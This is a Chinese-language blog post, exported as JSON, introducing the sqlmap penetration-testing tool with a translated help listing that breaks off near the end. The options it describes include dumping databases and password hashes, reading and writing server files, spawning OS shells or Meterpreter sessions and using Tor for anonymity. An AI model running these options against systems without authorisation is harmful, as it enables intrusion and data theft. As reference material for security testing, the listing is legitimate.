{"id":716,"date":"2025-10-24T14:24:22","date_gmt":"2025-10-24T06:24:22","guid":{"rendered":"https:\/\/www.youvii.site\/?p=716"},"modified":"2025-10-24T14:32:22","modified_gmt":"2025-10-24T06:32:22","slug":"sqlmap","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/sqlmap","title":{"rendered":"SQLmap"},"content":{"rendered":"

SQLmap<\/h1>\n

\u5b98\u7f51<\/h1>\n

https:\/\/sqlmap.org\/<\/a><\/p>\n

sqlmap\u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u5b83\u53ef\u4ee5\u81ea\u52a8\u5316\u68c0\u6d4b\u548c\u5229\u7528SQL\u6ce8\u5165\u6f0f\u6d1e\u5e76\u63a5\u7ba1\u6570\u636e\u5e93\u670d\u52a1\u5668\u3002\u5b83\u6709\u4e00\u4e2a\u5f3a\u5927\u7684\u68c0\u6d4b\u5f15\u64ce\uff0c\u8bb8\u591a\u9002\u5408\u4e8e\u7ec8\u6781\u6e17\u900f\u6d4b\u8bd5\u7684\u826f\u597d\u7279\u6027\u548c\u4f17\u591a\u7684\u64cd\u4f5c\u9009\u9879\uff0c\u4ece\u6570\u636e\u5e93\u6307\u7eb9\u3001\u6570\u636e\u83b7\u53d6\u5230\u8bbf\u95ee\u5e95\u5c42\u6587\u4ef6\u7cfb\u7edf\u3001\u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/p>\n

kali \u81ea\u5e26 sqlmap<\/p>\n

\u66f4\u65b0sqlmap<\/p>\n

python sqlmap.py --update<\/code><\/p>\n

\u663e\u793a\u7ec8\u7aef\u5e2e\u52a9\u6587\u6863<\/p>\n

sqlmap -h<\/code><\/p>\n

\u663e\u793asqlmap\u8be6\u7ec6\u7684\u5e2e\u52a9\u6587\u6863<\/p>\n

sqlmap -hh<\/code><\/p>\n

\u4e2d\u6587\u5e2e\u52a9\u6587\u6863<\/p>\n

\u7528\u6cd5\uff1apython sqlmap.py [\u9009\u9879]\n\u9009\u9879\uff1a\n-h, --help \u663e\u793a\u57fa\u672c\u5e2e\u52a9\u4fe1\u606f\u5e76\u9000\u51fa\n-hh \u663e\u793a\u9ad8\u7ea7\u5e2e\u52a9\u4fe1\u606f\u5e76\u9000\u51fa\n--version \u663e\u793a\u7a0b\u5e8f\u7248\u672c\u4fe1\u606f\u5e76\u9000\u51fa\n-v VERBOSE \u8f93\u51fa\u4fe1\u606f\u8be6\u7ec6\u7a0b\u5ea6\u7ea7\u522b\uff1a0-6\uff08\u9ed8\u8ba4\u4e3a 1\uff09\n\u76ee\u6807\uff1a\n\u81f3\u5c11\u63d0\u4f9b\u4e00\u4e2a\u4ee5\u4e0b\u9009\u9879\u4ee5\u6307\u5b9a\u76ee\u6807\n-d DIRECT \u76f4\u63a5\u8fde\u63a5\u6570\u636e\u5e93\n-u URL, --url=URL \u76ee\u6807 URL\uff08\u4f8b\u5982\uff1a\"http:\/\/www.site.com\/vuln.php?id=1\"\uff09\n-l LOGFILE \u4ece Burp \u6216 WebScarab \u4ee3\u7406\u7684\u65e5\u5fd7\u6587\u4ef6\u4e2d\u89e3\u6790\u76ee\u6807\u5730\u5740\n-x SITEMAPURL \u4ece\u8fdc\u7a0b\u7f51\u7ad9\u5730\u56fe\uff08.xml\uff09\u6587\u4ef6\u4e2d\u89e3\u6790\u76ee\u6807\n-m BULKFILE \u4ece\u6587\u672c\u6587\u4ef6\u4e2d\u83b7\u53d6\u6279\u91cf\u76ee\u6807\n-r REQUESTFILE \u4ece\u6587\u4ef6\u4e2d\u8bfb\u53d6 HTTP \u8bf7\u6c42\n-g GOOGLEDORK \u4f7f\u7528 Google dork \u7ed3\u679c\u4f5c\u4e3a\u76ee\u6807\n-c CONFIGFILE \u4ece INI \u914d\u7f6e\u6587\u4ef6\u4e2d\u52a0\u8f7d\u9009\u9879\n\u8bf7\u6c42\uff1a\n\u4ee5\u4e0b\u9009\u9879\u53ef\u4ee5\u6307\u5b9a\u8fde\u63a5\u76ee\u6807\u5730\u5740\u7684\u65b9\u5f0f\n  --method=METHOD \u5f3a\u5236\u4f7f\u7528\u63d0\u4f9b\u7684 HTTP \u65b9\u6cd5\uff08\u4f8b\u5982\uff1aPUT\uff09\n--data=DATA \u4f7f\u7528 POST \u53d1\u9001\u6570\u636e\u4e32\n--param-del=PARA.. \u8bbe\u7f6e\u53c2\u6570\u503c\u5206\u9694\u7b26\n--cookie=COOKIE \u6307\u5b9a HTTP Cookie\n--cookie-del=COO.. \u8bbe\u7f6e cookie \u5206\u9694\u7b26\n--load-cookies=L.. \u6307\u5b9a\u4ee5 Netscape\/wget \u683c\u5f0f\u5b58\u653e cookies \u7684\u6587\u4ef6\n--drop-set-cookie \u5ffd\u7565 HTTP \u54cd\u5e94\u4e2d\u7684 Set-Cookie \u53c2\u6570\n--user-agent=AGENT \u6307\u5b9a HTTP User-Agent\n--random-agent \u4f7f\u7528\u968f\u673a\u7684 HTTP User-Agent\n--host=HOST \u6307\u5b9a HTTP Host\n--referer=REFERER \u6307\u5b9a HTTP Referer\n-H HEADER, --hea.. \u8bbe\u7f6e\u989d\u5916\u7684 HTTP \u5934\u53c2\u6570\uff08\u4f8b\u5982\uff1a\"X-Forwarded-For: 127.0.0.1\"\uff09\n--headers=HEADERS \u8bbe\u7f6e\u989d\u5916\u7684 HTTP \u5934\u53c2\u6570\uff08\u4f8b\u5982\uff1a\"Accept-Language: frnETag: 123\"\uff09\n--auth-type=AUTH.. HTTP \u8ba4\u8bc1\u65b9\u5f0f\uff08Basic\uff0cDigest\uff0cNTLM \u6216 PKI\uff09\n--auth-cred=AUTH.. HTTP \u8ba4\u8bc1\u51ed\u8bc1\uff08username:password\uff09\n--auth-file=AUTH.. HTTP \u8ba4\u8bc1 PEM \u8bc1\u4e66\/\u79c1\u94a5\u6587\u4ef6\n--ignore-code=IG.. \u5ffd\u7565 HTTP \u9519\u8bef\u7801\uff08\u4f8b\u5982\uff1a401\uff09\n--ignore-proxy \u5ffd\u7565\u7cfb\u7edf\u9ed8\u8ba4\u4ee3\u7406\u8bbe\u7f6e\n--ignore-redirects \u5ffd\u7565\u91cd\u5b9a\u5411\u5c1d\u8bd5\n--ignore-timeouts \u5ffd\u7565\u8fde\u63a5\u8d85\u65f6\n--proxy=PROXY \u4f7f\u7528\u4ee3\u7406\u8fde\u63a5\u76ee\u6807 URL\n--proxy-cred=PRO.. \u4f7f\u7528\u4ee3\u7406\u8fdb\u884c\u8ba4\u8bc1\uff08username:password\uff09\n--proxy-file=PRO.. \u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7d\u4ee3\u7406\u5217\u8868\n--tor \u4f7f\u7528 Tor \u533f\u540d\u7f51\u7edc\n--tor-port=TORPORT \u8bbe\u7f6e Tor \u4ee3\u7406\u7aef\u53e3\u4ee3\u66ff\u9ed8\u8ba4\u7aef\u53e3\n--tor-type=TORTYPE \u8bbe\u7f6e Tor \u4ee3\u7406\u65b9\u5f0f\uff08HTTP\uff0cSOCKS4 \u6216 SOCKS5\uff08\u9ed8\u8ba4\uff09\uff09\n--check-tor \u68c0\u67e5\u662f\u5426\u6b63\u786e\u4f7f\u7528\u4e86 Tor\n--delay=DELAY \u8bbe\u7f6e\u6bcf\u4e2a HTTP \u8bf7\u6c42\u7684\u5ef6\u8fdf\u79d2\u6570\n--timeout=TIMEOUT \u8bbe\u7f6e\u8fde\u63a5\u54cd\u5e94\u7684\u6709\u6548\u79d2\u6570\uff08\u9ed8\u8ba4\u4e3a 30\uff09\n--retries=RETRIES \u8fde\u63a5\u8d85\u65f6\u65f6\u91cd\u8bd5\u6b21\u6570\uff08\u9ed8\u8ba4\u4e3a 3\uff09\n--randomize=RPARAM \u968f\u673a\u66f4\u6539\u7ed9\u5b9a\u7684\u53c2\u6570\u503c\n--safe-url=SAFEURL \u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\u53ef\u9891\u7e41\u8bbf\u95ee\u4e14\u5408\u6cd5\u7684 URL \u5730\u5740\uff08\u8bd1\u8005\u6ce8\uff1a\n\u6709\u4e9b\u7f51\u7ad9\u5728\u4f60\u8fde\u7eed\u591a\u6b21\u8bbf\u95ee\u9519\u8bef\u5730\u5740\u65f6\u4f1a\u5173\u95ed\u4f1a\u8bdd\u8fde\u63a5\uff0c\n\u540e\u9762\u7684\u201c\u8bf7\u6c42\u201d\u5c0f\u8282\u6709\u8be6\u7ec6\u8bf4\u660e\uff09\n--safe-post=SAFE.. \u4f7f\u7528 POST \u65b9\u6cd5\u53d1\u9001\u5408\u6cd5\u7684\u6570\u636e\n--safe-req=SAFER.. \u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7d\u5408\u6cd5\u7684 HTTP \u8bf7\u6c42\n--safe-freq=SAFE.. \u6bcf\u8bbf\u95ee\u4e24\u6b21\u7ed9\u5b9a\u7684\u5408\u6cd5 URL \u624d\u53d1\u9001\u4e00\u6b21\u6d4b\u8bd5\u8bf7\u6c42\n--skip-urlencode \u4e0d\u5bf9 payload \u6570\u636e\u8fdb\u884c URL \u7f16\u7801\n--csrf-token=CSR.. \u8bbe\u7f6e\u7f51\u7ad9\u7528\u6765\u53cd CSRF \u653b\u51fb\u7684 token\n--csrf-url=CSRFURL \u6307\u5b9a\u53ef\u63d0\u53d6\u53cd CSRF \u653b\u51fb token \u7684 URL\n--force-ssl \u5f3a\u5236\u4f7f\u7528 SSL\/HTTPS\n--hpp \u4f7f\u7528 HTTP \u53c2\u6570\u6c61\u67d3\u653b\u51fb\n--eval=EVALCODE \u5728\u53d1\u8d77\u8bf7\u6c42\u524d\u6267\u884c\u7ed9\u5b9a\u7684 Python \u4ee3\u7801\uff08\u4f8b\u5982\uff1a\n\"import hashlib;id2=hashlib.md5(id).hexdigest()\"\uff09\n\u4f18\u5316\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u4f18\u5316 sqlmap \u6027\u80fd\n-o \u5f00\u542f\u6240\u6709\u4f18\u5316\u5f00\u5173\n--predict-output \u9884\u6d4b\u5e38\u7528\u8bf7\u6c42\u7684\u8f93\u51fa\n--keep-alive \u4f7f\u7528\u6301\u4e45\u7684 HTTP(S) \u8fde\u63a5\n--null-connection \u4ec5\u83b7\u53d6\u9875\u9762\u5927\u5c0f\u800c\u975e\u5b9e\u9645\u7684 HTTP \u54cd\u5e94\n--threads=THREADS \u8bbe\u7f6e HTTP(S) \u8bf7\u6c42\u5e76\u53d1\u6570\u6700\u5927\u503c\uff08\u9ed8\u8ba4\u4e3a 1\uff09\n\u6ce8\u5165\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u6307\u5b9a\u8981\u6d4b\u8bd5\u7684\u53c2\u6570\uff0c\n\u63d0\u4f9b\u81ea\u5b9a\u4e49\u6ce8\u5165 payloads \u548c\u7be1\u6539\u53c2\u6570\u7684\u811a\u672c\n-p TESTPARAMETER \u6307\u5b9a\u9700\u8981\u6d4b\u8bd5\u7684\u53c2\u6570\n--skip=SKIP \u6307\u5b9a\u8981\u8df3\u8fc7\u7684\u53c2\u6570\n--skip-static \u6307\u5b9a\u8df3\u8fc7\u975e\u52a8\u6001\u53c2\u6570\n--param-exclude=.. \u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u6392\u9664\u53c2\u6570\uff08\u4f8b\u5982\uff1a\"ses\"\uff09\n--dbms=DBMS \u6307\u5b9a DBMS \u7c7b\u578b\uff08\u4f8b\u5982\uff1aMySQL\uff09\n--dbms-cred=DBMS.. DBMS \u8ba4\u8bc1\u51ed\u636e\uff08username:password\uff09\n--os=OS \u6307\u5b9a DBMS \u670d\u52a1\u5668\u7684\u64cd\u4f5c\u7cfb\u7edf\u7c7b\u578b\n--invalid-bignum \u5c06\u65e0\u6548\u503c\u8bbe\u7f6e\u4e3a\u5927\u6570\n--invalid-logical \u5bf9\u65e0\u6548\u503c\u4f7f\u7528\u903b\u8f91\u8fd0\u7b97\n--invalid-string \u5bf9\u65e0\u6548\u503c\u4f7f\u7528\u968f\u673a\u5b57\u7b26\u4e32\n--no-cast \u5173\u95ed payload \u6784\u9020\u673a\u5236\n--no-escape \u5173\u95ed\u5b57\u7b26\u4e32\u8f6c\u4e49\u673a\u5236\n--prefix=PREFIX \u6ce8\u5165 payload \u7684\u524d\u7f00\u5b57\u7b26\u4e32\n--suffix=SUFFIX \u6ce8\u5165 payload \u7684\u540e\u7f00\u5b57\u7b26\u4e32\n--tamper=TAMPER \u7528\u7ed9\u5b9a\u811a\u672c\u4fee\u6539\u6ce8\u5165\u6570\u636e\n\u68c0\u6d4b\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u81ea\u5b9a\u4e49\u68c0\u6d4b\u65b9\u5f0f\n--level=LEVEL \u8bbe\u7f6e\u6d4b\u8bd5\u7b49\u7ea7\uff081-5\uff0c\u9ed8\u8ba4\u4e3a 1\uff09\n--risk=RISK \u8bbe\u7f6e\u6d4b\u8bd5\u98ce\u9669\u7b49\u7ea7\uff081-3\uff0c\u9ed8\u8ba4\u4e3a 1\uff09\n--string=STRING \u7528\u4e8e\u786e\u5b9a\u67e5\u8be2\u7ed3\u679c\u4e3a\u771f\u65f6\u7684\u5b57\u7b26\u4e32\n--not-string=NOT.. \u7528\u4e8e\u786e\u5b9a\u67e5\u8be2\u7ed3\u679c\u4e3a\u5047\u65f6\u7684\u5b57\u7b26\u4e32\n--regexp=REGEXP \u7528\u4e8e\u786e\u5b9a\u67e5\u8be2\u7ed3\u679c\u4e3a\u771f\u65f6\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\n--code=CODE \u7528\u4e8e\u786e\u5b9a\u67e5\u8be2\u7ed3\u679c\u4e3a\u771f\u65f6\u7684 HTTP \u72b6\u6001\u7801\n--text-only \u53ea\u6839\u636e\u9875\u9762\u6587\u672c\u5185\u5bb9\u5bf9\u6bd4\u9875\u9762\n--titles \u53ea\u6839\u636e\u9875\u9762\u6807\u9898\u5bf9\u6bd4\u9875\u9762\n\u6280\u672f\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8c03\u6574\u7279\u5b9a SQL \u6ce8\u5165\u6280\u672f\u7684\u6d4b\u8bd5\u65b9\u6cd5\n--technique=TECH \u4f7f\u7528\u7684 SQL \u6ce8\u5165\u6280\u672f\uff08\u9ed8\u8ba4\u4e3a\u201cBEUSTQ\u201d\uff0c\u8bd1\u8005\u6ce8\uff1a\nB: Boolean-based blind SQL injection\uff08\u5e03\u5c14\u578b\u76f2\u6ce8\uff09\nE: Error-based SQL injection\uff08\u62a5\u9519\u578b\u6ce8\u5165\uff09\nU: UNION query SQL injection\uff08\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09\nS: Stacked queries SQL injection\uff08\u5806\u67e5\u8be2\u6ce8\u5165\uff09\nT: Time-based blind SQL injection\uff08\u65f6\u95f4\u578b\u76f2\u6ce8\uff09\nQ: inline Query injection\uff08\u5185\u8054\u67e5\u8be2\u6ce8\u5165\uff09\n--time-sec=TIMESEC \u5ef6\u8fdf DBMS \u7684\u54cd\u5e94\u79d2\u6570\uff08\u9ed8\u8ba4\u4e3a 5\uff09\n--union-cols=UCOLS \u8bbe\u7f6e\u8054\u5408\u67e5\u8be2\u6ce8\u5165\u6d4b\u8bd5\u7684\u5217\u6570\u76ee\u8303\u56f4\n--union-char=UCHAR \u7528\u4e8e\u66b4\u529b\u731c\u89e3\u5217\u6570\u7684\u5b57\u7b26\n--union-from=UFROM \u8bbe\u7f6e\u8054\u5408\u67e5\u8be2\u6ce8\u5165 FROM \u5904\u7528\u5230\u7684\u8868\n--dns-domain=DNS.. \u8bbe\u7f6e\u7528\u4e8e DNS \u6e17\u51fa\u653b\u51fb\u7684\u57df\u540d\uff08\u8bd1\u8005\u6ce8\uff1a\n\u63a8\u8350\u9605\u8bfb\u300a\u5728SQL\u6ce8\u5165\u4e2d\u4f7f\u7528DNS\u83b7\u53d6\u6570\u636e\u300b\nhttp:\/\/cb.drops.wiki\/drops\/tips-5283.html\uff0c\n\u5728\u540e\u9762\u7684\u201c\u6280\u672f\u201d\u5c0f\u8282\u4e2d\u4e5f\u6709\u76f8\u5e94\u89e3\u91ca\uff09\n--second-order=S.. \u8bbe\u7f6e\u4e8c\u9636\u54cd\u5e94\u7684\u7ed3\u679c\u663e\u793a\u9875\u9762\u7684 URL\uff08\u8bd1\u8005\u6ce8\uff1a\n\u8be5\u9009\u9879\u7528\u4e8e\u4e8c\u9636 SQL \u6ce8\u5165\uff09\n\u6307\u7eb9\u8bc6\u522b\uff1a\n-f, --fingerprint \u6267\u884c\u5e7f\u6cdb\u7684 DBMS \u7248\u672c\u6307\u7eb9\u8bc6\u522b\n\u679a\u4e3e\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u83b7\u53d6\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u4fe1\u606f\uff0c\u7ed3\u6784\u548c\u6570\u636e\u8868\u4e2d\u7684\u6570\u636e\u3002\n\u6b64\u5916\uff0c\u8fd8\u53ef\u4ee5\u8fd0\u884c\u4f60\u8f93\u5165\u7684 SQL \u8bed\u53e5\n-a, --all \u83b7\u53d6\u6240\u6709\u4fe1\u606f\u3001\u6570\u636e\n-b, --banner \u83b7\u53d6 DBMS banner\n--current-user \u83b7\u53d6 DBMS \u5f53\u524d\u7528\u6237\n--current-db \u83b7\u53d6 DBMS \u5f53\u524d\u6570\u636e\u5e93\n--hostname \u83b7\u53d6 DBMS \u670d\u52a1\u5668\u7684\u4e3b\u673a\u540d\n--is-dba \u63a2\u6d4b DBMS \u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a DBA\uff08\u6570\u636e\u5e93\u7ba1\u7406\u5458\uff09\n--users \u679a\u4e3e\u51fa DBMS \u6240\u6709\u7528\u6237\n--passwords \u679a\u4e3e\u51fa DBMS \u6240\u6709\u7528\u6237\u7684\u5bc6\u7801\u54c8\u5e0c\n--privileges \u679a\u4e3e\u51fa DBMS \u6240\u6709\u7528\u6237\u7279\u6743\u7ea7\n--roles \u679a\u4e3e\u51fa DBMS \u6240\u6709\u7528\u6237\u89d2\u8272\n--dbs \u679a\u4e3e\u51fa DBMS \u6240\u6709\u6570\u636e\u5e93\n--tables \u679a\u4e3e\u51fa DBMS \u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u8868\n--columns \u679a\u4e3e\u51fa DBMS \u8868\u4e2d\u7684\u6240\u6709\u5217\n--schema \u679a\u4e3e\u51fa DBMS \u6240\u6709\u6a21\u5f0f\n--count \u83b7\u53d6\u6570\u636e\u8868\u6570\u76ee\n--dump \u5bfc\u51fa DBMS \u6570\u636e\u5e93\u8868\u9879\n--dump-all \u5bfc\u51fa\u6240\u6709 DBMS \u6570\u636e\u5e93\u8868\u9879\n--search \u641c\u7d22\u5217\uff0c\u8868\u548c\/\u6216\u6570\u636e\u5e93\u540d\n--comments \u83b7\u53d6 DBMS \u6ce8\u91ca\n-D DB \u6307\u5b9a\u8981\u679a\u4e3e\u7684 DBMS \u6570\u636e\u5e93\n-T TBL \u6307\u5b9a\u8981\u679a\u4e3e\u7684 DBMS \u6570\u636e\u8868\n-C COL \u6307\u5b9a\u8981\u679a\u4e3e\u7684 DBMS \u6570\u636e\u5217\n-X EXCLUDECOL \u6307\u5b9a\u8981\u6392\u9664\u7684 DBMS \u6570\u636e\u5217\n-U USER \u6307\u5b9a\u679a\u4e3e\u7684 DBMS \u7528\u6237\n--exclude-sysdbs \u679a\u4e3e\u6240\u6709\u6570\u636e\u8868\u65f6\uff0c\u6307\u5b9a\u6392\u9664\u7279\u5b9a\u7cfb\u7edf\u6570\u636e\u5e93\n--pivot-column=P.. \u6307\u5b9a\u4e3b\u5217\n--where=DUMPWHERE \u5728\u8f6c\u50a8\u8868\u65f6\u4f7f\u7528 WHERE \u6761\u4ef6\u8bed\u53e5\n--start=LIMITSTART \u6307\u5b9a\u8981\u5bfc\u51fa\u7684\u6570\u636e\u8868\u6761\u76ee\u5f00\u59cb\u884c\u6570\n--stop=LIMITSTOP \u6307\u5b9a\u8981\u5bfc\u51fa\u7684\u6570\u636e\u8868\u6761\u76ee\u7ed3\u675f\u884c\u6570\n--first=FIRSTCHAR \u6307\u5b9a\u83b7\u53d6\u8fd4\u56de\u67e5\u8be2\u7ed3\u679c\u7684\u5f00\u59cb\u5b57\u7b26\u4f4d\n--last=LASTCHAR \u6307\u5b9a\u83b7\u53d6\u8fd4\u56de\u67e5\u8be2\u7ed3\u679c\u7684\u7ed3\u675f\u5b57\u7b26\u4f4d\n--sql-query=QUERY \u6307\u5b9a\u8981\u6267\u884c\u7684 SQL \u8bed\u53e5\n--sql-shell \u8c03\u51fa\u4ea4\u4e92\u5f0f SQL shell\n--sql-file=SQLFILE \u6267\u884c\u6587\u4ef6\u4e2d\u7684 SQL \u8bed\u53e5\n\u66b4\u529b\u7834\u89e3\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u66b4\u529b\u7834\u89e3\u6d4b\u8bd5\n--common-tables \u68c0\u6d4b\u5e38\u89c1\u7684\u8868\u540d\u662f\u5426\u5b58\u5728\n--common-columns \u68c0\u6d4b\u5e38\u7528\u7684\u5217\u540d\u662f\u5426\u5b58\u5728\n\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u521b\u5efa\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\n--udf-inject \u6ce8\u5165\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\n--shared-lib=SHLIB \u5171\u4eab\u5e93\u7684\u672c\u5730\u8def\u5f84\n\u8bbf\u95ee\u6587\u4ef6\u7cfb\u7edf\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u5e95\u5c42\u6587\u4ef6\u7cfb\u7edf\n--file-read=RFILE \u8bfb\u53d6\u540e\u7aef DBMS \u6587\u4ef6\u7cfb\u7edf\u4e2d\u7684\u6587\u4ef6\n--file-write=WFILE \u5199\u5165\u540e\u7aef DBMS \u6587\u4ef6\u7cfb\u7edf\u4e2d\u7684\u6587\u4ef6\n--file-dest=DFILE \u4f7f\u7528\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84\u5199\u5165\u5230\u540e\u7aef DBMS\n\u8bbf\u95ee\u64cd\u4f5c\u7cfb\u7edf\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u5e95\u5c42\u64cd\u4f5c\u7cfb\u7edf\n--os-cmd=OSCMD \u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\n--os-shell \u8c03\u51fa\u4ea4\u4e92\u5f0f\u64cd\u4f5c\u7cfb\u7edf shell\n--os-pwn \u8c03\u51fa OOB shell\uff0cMeterpreter \u6216 VNC\n--os-smbrelay \u4e00\u952e\u8c03\u51fa OOB shell\uff0cMeterpreter \u6216 VNC\n--os-bof \u5229\u7528\u5b58\u50a8\u8fc7\u7a0b\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\n--priv-esc \u6570\u636e\u5e93\u8fdb\u7a0b\u7528\u6237\u63d0\u6743\n--msf-path=MSFPATH Metasploit \u6846\u67b6\u7684\u672c\u5730\u5b89\u88c5\u8def\u5f84\n--tmp-path=TMPPATH \u8fdc\u7a0b\u4e34\u65f6\u6587\u4ef6\u76ee\u5f55\u7684\u7edd\u5bf9\u8def\u5f84\n\u8bbf\u95ee Windows \u6ce8\u518c\u8868\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684 Windows \u6ce8\u518c\u8868\n--reg-read \u8bfb\u53d6\u4e00\u4e2a Windows \u6ce8\u518c\u8868\u952e\u503c\n--reg-add \u5199\u5165\u4e00\u4e2a Windows \u6ce8\u518c\u8868\u952e\u503c\u6570\u636e\n--reg-del \u5220\u9664\u4e00\u4e2a Windows \u6ce8\u518c\u8868\u952e\u503c\n--reg-key=REGKEY \u6307\u5b9a Windows \u6ce8\u518c\u8868\u952e\n--reg-value=REGVAL \u6307\u5b9a Windows \u6ce8\u518c\u8868\u952e\u503c\n--reg-data=REGDATA \u6307\u5b9a Windows \u6ce8\u518c\u8868\u952e\u503c\u6570\u636e\n--reg-type=REGTYPE \u6307\u5b9a Windows \u6ce8\u518c\u8868\u952e\u503c\u7c7b\u578b\n\u901a\u7528\u9009\u9879\uff1a\n\u4ee5\u4e0b\u9009\u9879\u7528\u4e8e\u8bbe\u7f6e\u901a\u7528\u7684\u53c2\u6570\n-s SESSIONFILE \u4ece\u6587\u4ef6\uff08.sqlite\uff09\u4e2d\u8bfb\u5165\u4f1a\u8bdd\u4fe1\u606f\n-t TRAFFICFILE \u4fdd\u5b58\u6240\u6709 HTTP \u6d41\u91cf\u8bb0\u5f55\u5230\u6307\u5b9a\u6587\u672c\u6587\u4ef6\n--batch \u4ece\u4e0d\u8be2\u95ee\u7528\u6237\u8f93\u5165\uff0c\u4f7f\u7528\u9ed8\u8ba4\u914d\u7f6e\n--binary-fields=.. \u5177\u6709\u4e8c\u8fdb\u5236\u503c\u7684\u7ed3\u679c\u5b57\u6bb5\uff08\u4f8b\u5982\uff1a\"digest\"\uff09\n--check-internet \u5728\u8bbf\u95ee\u76ee\u6807\u4e4b\u524d\u68c0\u67e5\u662f\u5426\u6b63\u5e38\u8fde\u63a5\u4e92\u8054\u7f51\n--crawl=CRAWLDEPTH \u4ece\u76ee\u6807 URL \u5f00\u59cb\u722c\u53d6\u7f51\u7ad9\n--crawl-exclude=.. \u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u7b5b\u9009\u722c\u53d6\u7684\u9875\u9762\uff08\u4f8b\u5982\uff1a\"logout\"\uff09\n--csv-del=CSVDEL \u6307\u5b9a\u8f93\u51fa\u5230 CVS \u6587\u4ef6\u65f6\u4f7f\u7528\u7684\u5206\u9694\u7b26\uff08\u9ed8\u8ba4\u4e3a\u201c,\u201d\uff09\n--charset=CHARSET \u6307\u5b9a SQL \u76f2\u6ce8\u5b57\u7b26\u96c6\uff08\u4f8b\u5982\uff1a\"0123456789abcdef\"\uff09\n--dump-format=DU.. \u5bfc\u51fa\u6570\u636e\u7684\u683c\u5f0f\uff08CSV\uff08\u9ed8\u8ba4\uff09\uff0cHTML \u6216 SQLITE\uff09\n--encoding=ENCOD.. \u6307\u5b9a\u83b7\u53d6\u6570\u636e\u65f6\u4f7f\u7528\u7684\u5b57\u7b26\u7f16\u7801\uff08\u4f8b\u5982\uff1aGBK\uff09\n--eta \u663e\u793a\u6bcf\u4e2a\u7ed3\u679c\u8f93\u51fa\u7684\u9884\u8ba1\u5230\u8fbe\u65f6\u95f4\n--flush-session \u6e05\u7a7a\u5f53\u524d\u76ee\u6807\u7684\u4f1a\u8bdd\u6587\u4ef6\n--forms \u89e3\u6790\u5e76\u6d4b\u8bd5\u76ee\u6807 URL \u7684\u8868\u5355\n--fresh-queries \u5ffd\u7565\u5b58\u50a8\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u7684\u67e5\u8be2\u7ed3\u679c\n--har=HARFILE \u5c06\u6240\u6709 HTTP \u6d41\u91cf\u8bb0\u5f55\u5230\u4e00\u4e2a HAR \u6587\u4ef6\u4e2d\n--hex \u83b7\u53d6\u6570\u636e\u65f6\u8c03\u7528 DBMS \u7684 hex \u51fd\u6570\n--output-dir=OUT.. \u81ea\u5b9a\u4e49\u8f93\u51fa\u76ee\u5f55\u8def\u5f84\n--parse-errors \u4ece\u54cd\u5e94\u4e2d\u89e3\u6790\u5e76\u663e\u793a DBMS \u9519\u8bef\u4fe1\u606f\n--save=SAVECONFIG \u5c06\u9009\u9879\u8bbe\u7f6e\u4fdd\u5b58\u5230\u4e00\u4e2a INI \u914d\u7f6e\u6587\u4ef6\n--scope=SCOPE \u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u4ece\u63d0\u4f9b\u7684\u4ee3\u7406\u65e5\u5fd7\u4e2d\u8fc7\u6ee4\u76ee\u6807\n--test-filter=TE.. \u6839\u636e payloads \u548c\/\u6216\u6807\u9898\uff08\u4f8b\u5982\uff1aROW\uff09\u9009\u62e9\u6d4b\u8bd5\n--test-skip=TEST.. \u6839\u636e payloads \u548c\/\u6216\u6807\u9898\uff08\u4f8b\u5982\uff1aBENCHMARK\uff09\u8df3\u8fc7\u90e8\u5206\u6d4b\u8bd5\n--update \u66f4\u65b0 sqlmap\n\u5176\u4ed6\u9009\u9879\uff1a\n-z MNEMONICS \u4f7f\u7528\u77ed\u52a9\u8bb0\u7b26\uff08\u4f8b\u5982\uff1a\u201cflu,bat,ban,tec=EU\u201d\uff09\n--alert=ALERT \u5728\u627e\u5230 SQL \u6ce8\u5165\u65f6\u8fd0\u884c OS \u547d\u4ee4\n--answers=ANSWERS \u8bbe\u7f6e\u95ee\u9898\u7b54\u6848\uff08\u4f8b\u5982\uff1a\u201cquit=N,follow=N\u201d\uff09\n--beep \u51fa\u73b0\u95ee\u9898\u63d0\u9192\u6216\u5728\u53d1\u73b0 SQL \u6ce8\u5165\u65f6\u53d1\u51fa\u63d0\u793a\u97f3\n--cleanup \u6307\u5b9a\u79fb\u9664 DBMS \u4e2d\u7684\u7279\u5b9a\u7684 UDF 